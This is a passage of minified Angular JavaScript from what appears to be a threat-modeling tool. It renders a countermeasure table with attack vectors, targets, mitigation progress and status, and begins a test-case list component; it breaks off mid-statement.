M0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function v0t(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function A0t(t,a){if(1&t&&(m(0,"td",33),s(1," "),m(2,"mat-icon",35),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=B();C(2),at("matTooltip",re(3,2,i.GetCreationTypeIconTooltip(e))),C(2),ke(i.GetCreationTypeIcon(e))}}function T0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Control")," "))}function E0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.Control?null:e.Control.GetProperty("Name")," ")}}function D0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.AttackVectors")," "))}function x0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetAttackVectors(e)," ")}}function w0t(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Progress")," "))}function I0t(t,a){1&t&&it(0,"mat-progress-bar",38),2&t&&V("value",B().$implicit.MitigationProcess.Progress)}function R0t(t,a){if(1&t&&(m(0,"td",33),s(1," \n          "),ne(2,I0t,1,1,"mat-progress-bar",37),s(3,"\n        "),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.MitigationProcess)}}function S0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function k0t(t,a){if(1&t&&(m(0,"option",41),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function P0t(t,a){if(1&t){const e=Ye();m(0,"td",33),s(1,"\n          "),m(2,"select",39),he("ngModelChange",function(n){return Me(be(e).$implicit.MitigationState=n)}),s(3,"\n            "),ne(4,k0t,3,4,"option",40),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.MitigationState),C(2),V("ngForOf",i.GetMitigationStates())}}function O0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Targets")," "))}function N0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function L0t(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function z0t(t,a){if(1&t){const e=Ye();m(0,"td",33),s(1," "),m(2,"mat-icon",42),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function W0t(t,a){if(1&t){const e=Ye();m(0,"tr",47),he("click",function(){const r=be(e).$implicit;return Me(B().SelectCountermeasure(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("selected-item",i.IsCountermeasureSelected(e))("removed-item",i.IsCountermeasureRemoved(e)||i.IsCountermeasureNotApplying(e)||i.IsCountermeasureRejected(e)||i.IsCountermeasureDuplicated(e))}}function F0t(t,a){if(1&t&&(m(0,"span",56),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function V0t(t,a){1&t&&(m(0,"span",56),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}function B0t(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){const r=be(e).$implicit,c=B().item;return Me(B().AddExistingMitigationProcess(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function H0t(t,a){if(1&t){const e=Ye();s(0,"\n      "),ne(1,F0t,2,1,"span",48),s(2," \n      "),ne(3,V0t,3,3,"span",48),s(4,"\n      "),m(5,"button",49),he("click",function(){const r=be(e).item;return Me(B().OnMappingDblClick(r,null))}),s(6,"\n        "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n        "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n      "),u(),s(14," \n      "),m(15,"button",50),s(16,"\n        "),m(17,"mat-icon"),s(18,"security"),u(),s(19,"\n        "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n      "),u(),s(24,"\n      "),m(25,"mat-menu",null,51),s(27,"\n        "),m(28,"button",49),he("click",function(){const r=be(e).item;return Me(B().ViewMitigationProcess(r))}),s(29),oe(30,"translate"),u(),s(31,"\n        "),m(32,"button",52),he("click",function(){const r=be(e).item;return Me(B().AddMitigationProcess(r))}),s(33),oe(34,"translate"),u(),s(35,"\n        "),m(36,"button",53),s(37),oe(38,"translate"),u(),s(39,"\n      "),u(),s(40,"\n      "),m(41,"mat-menu",null,54),s(43,"\n        "),ne(44,B0t,2,1,"button",55),s(45,"\n      "),u(),s(46," \n      "),m(47,"button",49),he("click",function(){const r=be(e).item;return Me(B().OnDeleteMapping(r))}),s(48,"\n        "),m(49,"mat-icon"),s(50,"delete"),u(),s(51,"\n        "),m(52,"span"),s(53),oe(54,"translate"),u(),s(55,"\n      "),u(),s(56,"\n      "),m(57,"button",52),he("click",function(){return be(e),Me(B().ResetNumbers())}),s(58,"\n        "),m(59,"mat-icon"),s(60,"delete"),u(),s(61,"\n        "),m(62,"span"),s(63),oe(64,"translate"),u(),s(65,"\n      "),u(),s(66,"\n    ")}if(2&t){const e=a.item,i=Ti(26),n=Ti(42),r=B();C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,16,"pages.modeling.threattable.editEntry")),C(4),V("disabled",!e)("matMenuTriggerFor",i),C(6),ke(re(22,18,"properties.MitigationProcess")),C(7),V("disabled",null==e.MitigationProcess),C(1),ke(re(30,20,"pages.modeling.threattable.editEntry")),C(4),ke(re(34,22,"general.New")),C(3),V("matMenuTriggerFor",n),C(1),ke(re(38,24,"general.Existing")),C(7),V("ngForOf",r.GetPossibleMitigationProcesses(e)),C(3),V("disabled",!e),C(6),ke(re(54,26,"pages.modeling.threattable.deleteEntry")),C(10),ke(re(64,28,"pages.modeling.threattable.resetNumbers"))}}let U0t=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.mitigationEngine=n,this.dialog=r,this.translate=c,this.changesCounter=0,this.isCalculatingCountermeasures=!1,this._countermeasures=[],this.displayedColumns=[],this.autoRefreshCountermeasures=!0,this.menuTopLeftPosition={x:"0",y:"0"},this.selectedObjectChanged=new Tt,this.countermeasureCountChanged=new Tt;let d=()=>{this.autoRefreshCountermeasures&&(0==this.changesCounter?setTimeout(()=>{this.isCalculatingCountermeasures=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshCountermeasures()},500))};this.dataService.Project&&setTimeout(()=>{var T,k;null===(T=this.dataService.Project)||void 0===T||T.CountermeasuresChanged.subscribe(q=>d()),null===(k=this.dataService.Project)||void 0===k||k.AttackScenariosChanged.subscribe(q=>d())},1e3)}get refreshingCountermeasures(){return this.changesCounter>0||this.isCalculatingCountermeasures}get Countermeasures(){return this._countermeasures}set Countermeasures(e){this._filteredObject&&(e=e.filter(d=>d.Targets.includes(this._filteredObject))),this._countermeasures=e;const i=(d,T)=>{var k;return"name"==T?d.Name:"number"==T?Number(d.Number):"state"==T?d.MappingState:"type"==T?d.IsGenerated?1:0:"control"==T?null===(k=d.Control)||void 0===k?void 0:k.Name:"vectors"==T?this.GetAttackVectors(d):"status"==T?d.MappingState:"targets"==T?this.GetTargets(d):void console.error("Missing sorting header")},n=(d,T)=>{let k=T.trim().toLowerCase(),q=d.Name.toLowerCase().indexOf(k);return-1==q&&d.Control&&(q=d.Control.Name.toLowerCase().indexOf(k)),-1==q&&this.GetAttackVectors(d)&&(q=this.GetAttackVectors(d).toLowerCase().indexOf(k)),-1==q&&this.GetTargets(d)&&(q=this.GetTargets(d).toLowerCase().indexOf(k)),-1!=q},r=e.filter(d=>![Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(d.MitigationState));r.sort((d,T)=>Number(d.Number)<Number(T.Number)?-1:1),this.dataSourceActive=new Ld(r),this.dataSourceActive.sort=this.sort,this.dataSourceActive.sortingDataAccessor=i,this.dataSourceActive.filterPredicate=n;const c=e.filter(d=>[Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(d.MitigationState));c.sort((d,T)=>Number(d.Number)<Number(T.Number)?-1:1),this.dataSourceNA=new Ld(c),this.dataSourceNA.sort=this.sort,this.dataSourceNA.sortingDataAccessor=i,this.dataSourceNA.filterPredicate=n,this.sort&&this.sort.sortChange.emit(this.sort)}get selectedCountermeasure(){return this._selectedCountermeasure}set selectedCountermeasure(e){this._selectedCountermeasure=e}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.displayedColumns=["state","number","type","name","control","vectors","targets","progress","status","more"],this.RefreshCountermeasures()}get selectedObject(){return this._selectedObject}set selectedObject(e){var i;e&&(null===(i=this._selectedObject)||void 0===i?void 0:i.ID)==e.ID||(this._selectedObject=e)}set filteredObject(e){this._filteredObject=e,this.RefreshCountermeasures()}ngOnInit(){}onKeyDown(e){var i;if(this.isActive&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedCountermeasure){const n=(r,c)=>{this.SelectCountermeasure(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedCountermeasure);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedCountermeasure);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshCountermeasures(){setTimeout(()=>{var e,i,n;this.Countermeasures=[],!(null===(e=this._selectedNode)||void 0===e)&&e.data&&((null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof as?this.Countermeasures=this.mitigationEngine.GenerateDiagramMitigations(this._selectedNode.data):(null===(n=this._selectedNode)||void 0===n?void 0:n.data)instanceof Om&&(this.Countermeasures=this.mitigationEngine.GenerateStackMitigations(this._selectedNode.data))),this.countermeasureCountChanged.emit(this.dataSourceActive.data.length),this.isCalculatingCountermeasures=!1},10)}OnMappingDblClick(e,i){if(i&&i.target&&"progress"==this.displayedColumns[i.target.cellIndex]&&e.MitigationProcess)this.ViewMitigationProcess(e);else{let n=null;this.selectedNode.data instanceof as?n=this.selectedNode.data.Elements.GetChildrenFlat():this.selectedNode.data instanceof Om&&(n=this.selectedNode.data.GetChildrenFlat()),this.dialog.OpenCountermeasureDialog(e,!1,n,[...this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),...this.dataSourceNA.sortData(this.dataSourceNA.filteredData,this.sort)])}}ApplyFilter(e){const i=e.target.value;this.dataSourceActive.filter=i.trim().toLowerCase(),this.dataSourceNA.filter=i.trim().toLowerCase()}IsCountermeasureSelected(e){return this.selectedCountermeasure==e}IsCountermeasureRemoved(e){return e.MappingState==zn.Removed}IsCountermeasureNotApplying(e){return e.MitigationState==Ra.NotApplicable}IsCountermeasureRejected(e){return e.MitigationState==Ra.Rejected}IsCountermeasureDuplicated(e){return e.MitigationState==Ra.Duplicate}SelectCountermeasure(e){var i;this.selectedCountermeasure=e,(null===(i=e.Targets)||void 0===i?void 0:i.length)>0&&this.selectedObjectChanged.emit(e.Targets[0])}IsElementSelected(e){return e&&this.selectedObject&&e.Targets.includes(this.selectedObject)}OnDeleteMapping(e){this.dataService.Project.DeleteCountermeasure(e),this.RefreshCountermeasures()}ResetNumbers(){const e=this.dataService.Project.GetCountermeasures().sort((i,n)=>Number(i.Number)-Number(n.Number));for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}ViewMitigationProcess(e){this.dialog.OpenMitigationProcessDialog(e.MitigationProcess,!1)}AddMitigationProcess(e){let i=this.dataService.Project.CreateMitigationProcess();e.MitigationProcess=i,this.dialog.OpenMitigationProcessDialog(i,!0).subscribe(n=>{n||this.dataService.Project.DeleteMitigationProcess(i)})}GetPossibleMitigationProcesses(e){return this.dataService.Project.GetMitigationProcesses().filter(i=>i!=e.MitigationProcess)}AddExistingMitigationProcess(e,i){e.MitigationProcess=i}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}GetStateIcon(e){return e.MappingState==zn.New?"add":e.MappingState==zn.Removed?"remove":""}GetCreationTypeIcon(e){return e.IsGenerated?"settings_suggest":"handyman"}GetCreationTypeIconTooltip(e){return e.IsGenerated?"general.Generated":"general.Manual"}GetAttackVectors(e){return e.AttackVectors.map(i=>i.GetProperty("Name")).join(", ")}GetTargets(e){return e.Targets.filter(i=>i).map(i=>i.GetProperty("Name")).join(", ")}GetApplicableCount(){return Gi.Format(this.translate.instant("pages.modeling.threattable.applicable"),this.dataSourceActive.data.length.toString(),this.Countermeasures.length.toString())}GetMitigationStates(){return al.GetMitigationStates()}GetMitigationStateName(e){return al.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Hgt),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-countermeasure-table"]],viewQuery:function(e,i){if(1&e&&(Mi(po,5),Mi(il,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",countermeasureCountChanged:"countermeasureCountChanged"},decls:193,vars:39,consts:[[2,"height","100%","display","grid","align-content","start"],[1,"tools"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["matInput","",1,"filterInput",3,"spellcheck","placeholder","keyup"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["style","float: right; padding-top: 5px;",4,"ngIf"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","state","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","state"],["mat-header-cell","","mat-sort-header","","style","width: 34px;",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","name"],["matColumnDef","type"],["matColumnDef","control"],["matColumnDef","vectors"],["matColumnDef","progress"],["mat-header-cell","",4,"matHeaderCellDef"],["matColumnDef","status"],["matColumnDef","targets"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","more"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["mat-row","",3,"selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],[2,"float","right","padding-top","5px"],["mat-header-cell","","mat-sort-header","",2,"width","34px"],["mat-cell",""],["mat-header-cell","","mat-sort-header",""],[3,"matTooltip"],["mat-header-cell",""],["class","disable","color","primary","style","width: 100px; margin-right: 3px;",3,"value",4,"ngIf"],["color","primary",1,"disable",2,"width","100px","margin-right","3px",3,"value"],[2,"width","140px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","9",1,"mat-cell",3,"contextmenu"],["mat-row","",3,"click","dblclick","contextmenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"disabled","matMenuTriggerFor"],["procMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.RefreshCountermeasures()}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"refresh"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",2),he("click",function(){return i.autoRefreshCountermeasures=!i.autoRefreshCountermeasures}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon"),s(15,"autorenew"),u(),s(16,"\n    "),u(),s(17,"\n    "),m(18,"input",3),he("keyup",function(r){return i.ApplyFilter(r)}),oe(19,"translate"),u(),s(20,"\n    "),ne(21,Ugt,1,1,"mat-progress-spinner",4),s(22,"\n    "),ne(23,qgt,2,1,"span",5),s(24,"\n  "),u(),s(25,"\n  "),m(26,"div",6),s(27,"\n    "),s(28,"\n    "),m(29,"table",7),s(30,"\n      "),bt(31,8),s(32,"\n        "),ne(33,Ggt,2,0,"th",9),s(34,"\n        "),ne(35,jgt,5,1,"td",10),s(36,"\n      "),Mt(),s(37,"\n      "),bt(38,11),s(39,"\n        "),ne(40,Qgt,3,3,"th",12),s(41,"\n        "),ne(42,$gt,2,1,"td",10),s(43,"\n      "),Mt(),s(44,"\n      "),bt(45,13),s(46,"\n        "),ne(47,Kgt,3,3,"th",12),s(48,"\n        "),ne(49,Xgt,2,1,"td",10),s(50,"\n      "),Mt(),s(51,"\n      "),bt(52,14),s(53,"\n        "),ne(54,Ygt,2,0,"th",12),s(55,"\n        "),ne(56,Jgt,6,4,"td",10),s(57,"\n      "),Mt(),s(58,"\n      "),bt(59,15),s(60,"\n        "),ne(61,Zgt,3,3,"th",12),s(62,"\n        "),ne(63,e0t,2,1,"td",10),s(64,"\n      "),Mt(),s(65,"\n      "),bt(66,16),s(67,"\n        "),ne(68,t0t,3,3,"th",12),s(69,"\n        "),ne(70,i0t,2,1,"td",10),s(71,"\n      "),Mt(),s(72,"\n      "),bt(73,17),s(74,"\n        "),ne(75,a0t,3,3,"th",18),s(76,"\n        "),ne(77,o0t,4,1,"td",10),s(78,"\n      "),Mt(),s(79,"\n      "),bt(80,19),s(81,"\n        "),ne(82,r0t,3,3,"th",12),s(83,"\n        "),ne(84,c0t,7,2,"td",10),s(85,"\n      "),Mt(),s(86,"\n      "),bt(87,20),s(88,"\n        "),ne(89,l0t,3,3,"th",12),s(90,"\n        "),ne(91,d0t,2,3,"td",21),s(92,"\n      "),Mt(),s(93,"\n      "),bt(94,22),s(95,"\n        "),ne(96,m0t,2,0,"th",18),s(97,"\n        "),ne(98,u0t,6,3,"td",10),s(99,"\n      "),Mt(),s(100,"\n  \n      "),ne(101,h0t,1,0,"tr",23),s(102,"\n      "),ne(103,f0t,2,5,"tr",24),s(104,"\n      "),ne(105,p0t,6,3,"tr",25),s(106,"\n    "),u(),s(107,"\n    "),s(108,"\n    "),m(109,"table",7),s(110,"\n      "),bt(111,8),s(112,"\n        "),ne(113,_0t,2,0,"th",9),s(114,"\n        "),ne(115,g0t,5,1,"td",10),s(116,"\n      "),Mt(),s(117,"\n      "),bt(118,11),s(119,"\n        "),ne(120,C0t,3,3,"th",12),s(121,"\n        "),ne(122,y0t,2,1,"td",10),s(123,"\n      "),Mt(),s(124,"\n      "),bt(125,13),s(126,"\n        "),ne(127,b0t,3,3,"th",12),s(128,"\n        "),ne(129,M0t,2,1,"td",10),s(130,"\n      "),Mt(),s(131,"\n      "),bt(132,14),s(133,"\n        "),ne(134,v0t,2,0,"th",12),s(135,"\n        "),ne(136,A0t,6,4,"td",10),s(137,"\n      "),Mt(),s(138,"\n      "),bt(139,15),s(140,"\n        "),ne(141,T0t,3,3,"th",12),s(142,"\n        "),ne(143,E0t,2,1,"td",10),s(144,"\n      "),Mt(),s(145,"\n      "),bt(146,16),s(147,"\n        "),ne(148,D0t,3,3,"th",12),s(149,"\n        "),ne(150,x0t,2,1,"td",10),s(151,"\n      "),Mt(),s(152,"\n      "),bt(153,17),s(154,"\n        "),ne(155,w0t,3,3,"th",18),s(156,"\n        "),ne(157,R0t,4,1,"td",10),s(158,"\n      "),Mt(),s(159,"\n      "),bt(160,19),s(161,"\n        "),ne(162,S0t,3,3,"th",12),s(163,"\n        "),ne(164,P0t,7,2,"td",10),s(165,"\n      "),Mt(),s(166,"\n      "),bt(167,20),s(168,"\n        "),ne(169,O0t,3,3,"th",12),s(170,"\n        "),ne(171,N0t,2,3,"td",21),s(172,"\n      "),Mt(),s(173,"\n      "),bt(174,22),s(175,"\n        "),ne(176,L0t,2,0,"th",18),s(177,"\n        "),ne(178,z0t,6,3,"td",10),s(179,"\n      "),Mt(),s(180,"\n  \n      "),ne(181,W0t,2,4,"tr",26),s(182,"\n    "),u(),s(183,"\n  "),u(),s(184,"\n  "),it(185,"div",27),s(186," \n  "),m(187,"mat-menu",null,28),s(189," \n    "),ne(190,H0t,67,30,"ng-template",29),s(191," \n  "),u(),s(192," \n"),u()),2&e){const n=Ti(188);C(4),at("matTooltip",re(5,33,"general.Refresh")),C(7),Ct("toolBtn-Selected",i.autoRefreshCountermeasures),at("matTooltip",re(12,35,"pages.modeling.threattable.autoRefresh")),C(7),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(19,37,"pages.modeling.filter")),V("spellcheck",i.dataService.HasSpellCheck),C(3),V("ngIf",i.refreshingCountermeasures),C(2),V("ngIf",i.Countermeasures.length>0),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceActive),C(72),V("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedColumns),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceNA),C(72),V("matRowDefColumns",i.displayedColumns),C(4),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,pm,_m,Td,Ta,Ea,oa,da,Xa,wl,Xo,qo,po,Zc,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,yp,il,Mp,hA,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();function q0t(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",14),he("click",function(){const r=be(e).$implicit;return Me(B().selectedTestCase=r)}),s(1,"\n          "),m(2,"mat-icon",15),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",16),s(6),u(),s(7,"\n          "),m(8,"div",16),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n          "),m(13,"button",17),he("click",function(){const r=be(e).$implicit;return Me(B().DeleteTestCase(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedTestCase===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedTestCase===e&&i.theme.IsDarkMode),C(6),ke(e.GetLongName()),C(3),za("",re(10,8,"properties.Status"),": ",re(11,10,i.GetStatus(e.Status)),""),C(4),at("matTooltip",re(14,12,"general.Delete"))}}function G0t(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"div",18),s(3,"\n          "),it(4,"app-test-case",19),s(5,"\n        "),u(),s(6,"\n      "),Mt()),2&t){const e=B();C(4),V("testCase",e.selectedTestCase)}}let j0t=(()=>{class t{constructor(e,i){this.dataService=e,this.theme=i}ngOnInit(){}AddTestCase(){const e=this.dataService.Project.CreateTestCase();return this.testing.AddTestCase(e),this.selectedTestCase=e,setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250),e}DeleteTestCase(e){this.selectedTestCase==e&&(this.selectedTestCase=null),this.dataService.Project.DeleteTestCase(e)}ResetNumbers(){const e=this.dataService.Project.GetTesting().TestCases;for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}drop(e){Qs(this.testing.Data.testCaseIDs,e.previousIndex,e.currentIndex)}GetStatus(e){return $g.ToString(e)}}return t.\u0275fac=function(e){return 